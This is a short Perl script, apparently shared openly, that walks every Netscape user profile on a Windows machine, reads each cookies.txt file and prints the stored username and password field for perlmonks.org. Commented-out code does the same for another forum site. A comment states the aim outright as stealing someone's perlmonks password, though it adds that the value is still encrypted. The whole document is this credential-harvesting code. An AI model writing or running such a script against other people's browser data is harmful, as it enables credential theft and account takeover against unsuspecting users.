use strict; my @cookies; my @line; my $user; chdir "c:/Program Files/Netscape/Users/"; my @users = `dir /b`; foreach $user (@users) { chomp($user); print "Displaying cookie passwords for $user.\n\n"; open(COOKIE, "<c:/Program Files/Netscape/Users/$user/cookies.txt"); push (@cookies, <COOKIE>); shift(@cookies); shift(@cookies); shift(@cookies); shift(@cookies); foreach (@cookies) { @line = split(/\s+/,$_); # list of websites that have given cookies # print "The website is @line[0].\n"; # boards.stratics.com # if (@line[$_] =~ m/boards.stratics.com/) { # my @stratics = (@line[5], @line[6]); # print "boards.stratics.com\n"; # print "@line[5]\t"; # print "@line[6]\n"; # } # steal someone's perlmonks password from there Netscape cookie file # they may be a maximum of 10 characters. The password is # still unusable, because it is encrypted. if (@line[$_] =~ m/perlmonks.org/) { print "@line[0]\n"; my @perlmonks = split(/\%/, @line[6]); print "username: @perlmonks[0]\n"; print "password: @perlmonks[1]\n"; } } } close(COOKIE);

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